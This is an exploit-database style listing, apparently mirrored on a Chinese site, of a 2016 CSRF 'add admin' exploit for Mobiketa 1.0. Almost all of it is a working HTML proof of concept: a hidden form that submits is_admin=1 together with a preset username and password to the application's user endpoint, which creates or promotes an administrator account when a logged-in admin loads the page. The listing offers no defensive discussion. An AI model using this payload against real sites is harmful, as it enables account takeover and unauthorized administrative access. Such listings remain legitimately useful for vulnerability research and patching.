|
Mobiketa 1.0 - CSRF Add Admin Exploit
|
|
来源:http://twitter.com/muratyilmazlarr 作者:Yilmazlar 发布时间:2016-06-12
|
|
<!--
# Exploit Title: Mobiketa - CSRF Add Admin Exploit
# Date: 09/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://www.ynetinteractive.com/mobiketa/
# Version: 1.0
# Exploit:
< -- bug code started -- >
-->
<html>
<body>
<form action="[SITE]/[mobiketa_path]/index.php?url=user" method="POST"
enctype="multipart/form-data">
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="name" value="murat y" />
<input type="hidden" name="email"
value="murrat@protonmail.com" />
<input type="hidden" name="username" value="murrat" />
<input type="hidden" name="password" value="123123123" />
<input type="hidden" name="id" value="15" />
<input type="hidden" name="update" value=" " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
< -- end of the bug code -- >
#########################
[+] Contact: http://twitter.com/muratyilmazlarr
-->
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
